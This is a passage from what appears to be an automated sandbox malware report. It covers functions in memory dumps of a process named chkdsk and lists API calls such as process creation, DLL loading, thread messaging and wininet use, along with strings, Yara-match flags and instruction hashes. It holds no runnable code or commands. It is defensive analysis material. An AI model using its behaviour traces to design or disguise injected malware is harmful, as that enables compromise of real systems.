                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a2cd0c714c765691acad63bd7138885c679fddf922ffc4b3ad9313158abbdc49
                                                      • Instruction ID: 9d4d19e10681e247904e20eb3a71387fa483395afe5356338d4446d7713316a5
                                                      • Opcode Fuzzy Hash: a2cd0c714c765691acad63bd7138885c679fddf922ffc4b3ad9313158abbdc49
                                                      • Instruction Fuzzy Hash: 28900226212400030205B5580745547406687E9351395C022F1019551CD72189616121
                                                      Function 05422AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9c26d1adcf8a6b01f2e043325740b7a8483e941f4b486bc8df3f56963c383c15
                                                      • Instruction ID: faedea6d44ebeb65e10b917d1970f2ec7a0d18353e12625f4775c0c461df07fd
                                                      • Opcode Fuzzy Hash: 9c26d1adcf8a6b01f2e043325740b7a8483e941f4b486bc8df3f56963c383c15
                                                      • Instruction Fuzzy Hash: 5B900226222400020245B558064554B446597EA3513D5C016F141A591CC72189656321
                                                      Function 007601FF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 598 7601ff-760205 599 760207-76020b 598->599 600 760230-76029e call 779690 call 77a0a0 call 763be0 call 751410 call 770a00 598->600 599->600 611 7602c0-7602c5 600->611 612 7602a0-7602b1 PostThreadMessageW 600->612 612->611 613 7602b3-7602bd 612->613 613->611
                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 007602AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: ea8dc3d9c3447559d540e6d901886e79264df6b1ffa234ff59c1ae421aebd605
                                                      • Instruction ID: 92b5e36b85caf8bced2ac756a327211e30afb579cbf6055795e89109a1165a6f
                                                      • Opcode Fuzzy Hash: ea8dc3d9c3447559d540e6d901886e79264df6b1ffa234ff59c1ae421aebd605
                                                      • Instruction Fuzzy Hash: 44110A71D40248B6DB11A7A08C07FDF7B7C5F81750F008255FE14BB1C1E678A60687E5
                                                      Function 0076022A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 614 76022a-760240 615 760249-76029e call 77a0a0 call 763be0 call 751410 call 770a00 614->615 616 760244 call 779690 614->616 625 7602c0-7602c5 615->625 626 7602a0-7602b1 PostThreadMessageW 615->626 616->615 626->625 627 7602b3-7602bd 626->627 627->625
                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 007602AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: d47d530e30957930460fab38316295c075d586d169e600f9ad0bb35da11151a9
                                                      • Instruction ID: b6d9ccd34c0657189ab45fc7213e7123c0bda59ab81cc8031e4fa50adef97af6
                                                      • Opcode Fuzzy Hash: d47d530e30957930460fab38316295c075d586d169e600f9ad0bb35da11151a9
                                                      • Instruction Fuzzy Hash: B911C871D41358B6EB21AAA08C06FDF7B7C5F41790F048055FE087B181E67896068BE5
                                                      Function 00760230 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 007602AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: 3b1b99b9c13a98c7ba04de89d0eadab1f8c91b9564677e330a7a51c3aea08bc4
                                                      • Instruction ID: a0f2154687ed917c24be594056cb739b4bccc8191d05c2c7adcd15ac6980835d
                                                      • Opcode Fuzzy Hash: 3b1b99b9c13a98c7ba04de89d0eadab1f8c91b9564677e330a7a51c3aea08bc4
                                                      • Instruction Fuzzy Hash: 02019671D41358B6EB11ABA08C06FDF7B7C9F41B90F058165FE087B181E6B866068BE5
                                                      Function 007722C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 0077238B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 5e4915f54d8920f0a65079b900206bbd1372dc618a7ed44f0fe160733810f925
                                                      • Instruction ID: f50bf80f5620483a10bf29463f708d861b9e4462bc76d5780415b2e52ad94f8f
                                                      • Opcode Fuzzy Hash: 5e4915f54d8920f0a65079b900206bbd1372dc618a7ed44f0fe160733810f925
                                                      • Instruction Fuzzy Hash: AA3170B1641705FBCB14DF64C885FE6BBA8AB44340F008519B61D9B241D778BA55CBA0
                                                      Function 00777A20 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00760E49,?,Bw,00760E49,00773DC7,00774209,?,00760E49,00773DC7,00001000,?,?,007792F3), ref: 00777A5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: Bw
                                                      • API String ID: 1279760036-4240321413
                                                      • Opcode ID: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
                                                      • Instruction ID: ca26ace8b85656c5d006b96c444e558d89cd092aa8d1629ee6b8225531d541af
                                                      • Opcode Fuzzy Hash: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
                                                      • Instruction Fuzzy Hash: 24E06D71200244BFD614EE98EC45FEB37ADEF84720F108409F908A7241CA70BD10CBB4
                                                      Function 0076E367 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0076E387
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: ff12fda594aec73ca92d915bcb33bb9ce4d1c9d65c15240ca1ddb6ee378235be
                                                      • Instruction ID: 3a7fb241241134dd703457c6bfe8da92976734e63bcfff9483ea5775505dc122
                                                      • Opcode Fuzzy Hash: ff12fda594aec73ca92d915bcb33bb9ce4d1c9d65c15240ca1ddb6ee378235be
                                                      • Instruction Fuzzy Hash: B03140B5A006099FDB00DF98C8809EFB7B9FF88304F108559F906EB215DB74AE45CBA0
                                                      Function 0076E370 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0076E387
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: 27cc4ac8af34ea21c69b4d0e7073fdd397a4a5683a00f57dd03264e858539acb
                                                      • Instruction ID: 74c5c97a9b63dc83cb7771226551a320ce07374caa80c4eb8f47ebf39b01a26f
                                                      • Opcode Fuzzy Hash: 27cc4ac8af34ea21c69b4d0e7073fdd397a4a5683a00f57dd03264e858539acb
                                                      • Instruction Fuzzy Hash: 033110B5A006099FDB10DFD8C8809EEB7B9FF88304B108559E916A7214DB75AE05CBA0
                                                      Function 00763BE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00763C52
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
                                                      • Instruction ID: 3616b8911fc93776df64c5f28213f2d6b994ab722df06a88b3c106d2c3023940
                                                      • Opcode Fuzzy Hash: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
                                                      • Instruction Fuzzy Hash: 3F014CB5D0020DBBDF10DAA0DC46F9DB3B89B54308F0081A5E91DA7281F635EB54CBA2
                                                      Function 00777B00 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(007606E1,00760709,007604E1,00000000,007674A3,00000010,00760709,?,?,00000044,00760709,00000010,007674A3,00000000,007604E1,00760709), ref: 00777B60
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: fba9c78066fb86d9f91f51c3de77d0f2a62298edbe6becbb889d3f07a3a84429
                                                      • Instruction ID: 779b2f50846458ccb0febb4e91bc2859e49e45c16c68cf783996aab3dd0bb559
                                                      • Opcode Fuzzy Hash: fba9c78066fb86d9f91f51c3de77d0f2a62298edbe6becbb889d3f07a3a84429
                                                      • Instruction Fuzzy Hash: 9901D6B2204108BBCB44DE89DC81EEB77ADAF8C754F408108BA0DE3240D630F8518BA4
                                                      Function 00767530 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 0076750C
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 0b15cb72b24f5e271675e8c2dc2b7ab85076c8575cf3a05a3f02fb29d32ac1da
                                                      • Instruction ID: 634d07341a5cd968526d7ba379cf11758cacb09fbaea2418261d011b20ed8615
                                                      • Opcode Fuzzy Hash: 0b15cb72b24f5e271675e8c2dc2b7ab85076c8575cf3a05a3f02fb29d32ac1da
                                                      • Instruction Fuzzy Hash: 96F04C6164868497DF2B12388C167E63B180F03359F3C49A4F987DB8C7E628D826C294
                                                      Function 007592C0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759305
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: c07eec7fca1468d05d1c170caf4222add6f24925edd0f0dce4a231747551d0e5
                                                      • Instruction ID: b7ff486d2758d1f78f2c09ee033421c7f5b0a2b9c365256159f3ba15ebe19a93
                                                      • Opcode Fuzzy Hash: c07eec7fca1468d05d1c170caf4222add6f24925edd0f0dce4a231747551d0e5
                                                      • Instruction Fuzzy Hash: 0FF06573380204BAE62065A99C03FD7769C9B847A2F154426FB0DEB1C1D595B40142E5
                                                      Function 007592B8 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00759305
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 0e6facdd21fb09dacd1459298f00ccc7c7a0e5d5e8a0fbfedfd4b58723e37bba
                                                      • Instruction ID: 0af802bb191ba4b258fc77e0117dbad932593c9e15db206f8c369ff39f689391
                                                      • Opcode Fuzzy Hash: 0e6facdd21fb09dacd1459298f00ccc7c7a0e5d5e8a0fbfedfd4b58723e37bba
                                                      • Instruction Fuzzy Hash: 86F02B72280244B9E73062A89C03FDB779C8F80791F204119F70DEB1C1C5D6740246E4
                                                      Function 00777A70 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,787DA667,00000007,00000000,00000004,00000000,007634C3,000000F4,?,?,?,?,?), ref: 00777AAF
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
                                                      • Instruction ID: 6322f180748aa9e32c0557d61f116c132b57e871b6307ffff6f06fe1e2ba4d48
                                                      • Opcode Fuzzy Hash: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
                                                      • Instruction Fuzzy Hash: 6CE06D71200304BFD614EE58DC49FAB37ADEF89711F004408F909A7241DA70B81087F5
                                                      Function 007674E0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 0076750C
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 011410a5f2eb924cfff189fc5ba29a09c652b7c2c06128ec5833352805b48186
                                                      • Instruction ID: e2d6347793931b16aa4e57b78e3d9dd59a06bd9eba58c001f55418db9f92678c
                                                      • Opcode Fuzzy Hash: 011410a5f2eb924cfff189fc5ba29a09c652b7c2c06128ec5833352805b48186
                                                      • Instruction Fuzzy Hash: 51E0807124430857FB246678DC45F6633584744769F5949A0FD1FDB5C3E57CF911C150
                                                      Function 007672E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00761130,dw,00773DC7,?), ref: 00767323
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 6324c3716770a43747702c452d78498f71c6a11b53caf19468caabd63fb3781a
                                                      • Instruction ID: 5f727f90f220241a84cba06710d898e52dd65686249f96a211bebf9d7b2c382f
                                                      • Opcode Fuzzy Hash: 6324c3716770a43747702c452d78498f71c6a11b53caf19468caabd63fb3781a
                                                      • Instruction Fuzzy Hash: 19E086716842447EFB10E2B49C47FF52F559B84344F4580BCB848D7283E855A50186A0
                                                      Function 007672F0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00761130,dw,00773DC7,?), ref: 00767323
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 48fc90a61e18b2f1077fd252f05b303faf41566d1f6743137865446243a301f2
                                                      • Instruction ID: b09f055764498ed80f9faba80b354b9015819e7fa2c5f27466d43fe450742c4b
                                                      • Opcode Fuzzy Hash: 48fc90a61e18b2f1077fd252f05b303faf41566d1f6743137865446243a301f2
                                                      • Instruction Fuzzy Hash: DCD05EB17803087BFA00E6B5DC47F66368C9B44795F868078BD0CE76C3E969F50086E5
                                                      Function 05422C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d20d8256080868549fdff66a3feb425552a267e498bbc7698aae12b4ce466b48
                                                      • Instruction ID: 0befa8ec423e3a838d288e1b687c676167472ec9d86475795cb4f66aab4fce00
                                                      • Opcode Fuzzy Hash: d20d8256080868549fdff66a3feb425552a267e498bbc7698aae12b4ce466b48
                                                      • Instruction Fuzzy Hash: 4BB09B729065D5C5DB11F7604609B57792177D0701F55C063E3074752E4778C1D1F175

                                                      Non-executed Functions

                                                      Function 0075D8A9 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05277d6522010f49c34dfb13a0f287429e1780aaa73adc7c2ec3e775ec93a475
                                                      • Instruction ID: e606acae039b21ee761fd03c782cb7e36312d4ca1eeec3957f4600092f751937
                                                      • Opcode Fuzzy Hash: 05277d6522010f49c34dfb13a0f287429e1780aaa73adc7c2ec3e775ec93a475
                                                      • Instruction Fuzzy Hash: F7C08C23A2720002E926580DB4903F6EB68E793132D8866ABDC8BBB202C182D45102DE
                                                      Function 00761B46 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adfa8824ba12893573f24bbddba9d89d974079982f410c7c31f310173d234243
                                                      • Instruction ID: de9dbf575066db9d4e445d591fd9d23a1e3af454c317aaa6cfe53130fd53da5c
                                                      • Opcode Fuzzy Hash: adfa8824ba12893573f24bbddba9d89d974079982f410c7c31f310173d234243
                                                      • Instruction Fuzzy Hash: B6B09213B042480161286C8A78800B8F7A0D6C3232E5823BAEA4CA30404043C914429C
                                                      Function 05422890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: c7fd2a2f1425dae3e71c66eccb227184f2a6eba7bd1385a78e9c2738d3f1c1f2
                                                      • Instruction ID: 8781d639847853c9edead90b55ae8a66d5005a81a0885a43548eca5122e2ccb8
                                                      • Opcode Fuzzy Hash: c7fd2a2f1425dae3e71c66eccb227184f2a6eba7bd1385a78e9c2738d3f1c1f2
                                                      • Instruction Fuzzy Hash: 2251DAB6B081367FCB20DB598990AFFF7B9BB09201794836BE455D7641E274DE408BA0
                                                      Function 05417630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 05454787
                                                      • Execute=1, xrefs: 05454713
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05454655
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05454725
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05454742
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 054546FC
                                                      • ExecuteOptions, xrefs: 054546A0
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 5feca1e9099daaf8c708cf9a2da1360e1c29409eb112567e52650ffcaf3ca7c5
                                                      • Instruction ID: 49b53077558c1e05de174637057b7ba6cb4cffab055a063a63fd45b26eded3e6
                                                      • Opcode Fuzzy Hash: 5feca1e9099daaf8c708cf9a2da1360e1c29409eb112567e52650ffcaf3ca7c5
                                                      • Instruction Fuzzy Hash: D051E7316402197ADF14EAA5EC99FEA77A9FF04320F0400DFE905AB281DB71AE45CF55
                                                      Function 0542B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 49110d8325f2545f4fb3f100ea3c26c03523ec41d0a3ba68e52e8196f95e76a2
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: A281B230E052799EDF24CE68C8517FEBBA2FF85310F98819BD8A1A7391C7349841CB51
                                                      Function 0540F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054502E7
                                                      • RTL: Re-Waiting, xrefs: 0545031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054502BD
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmpDownload File
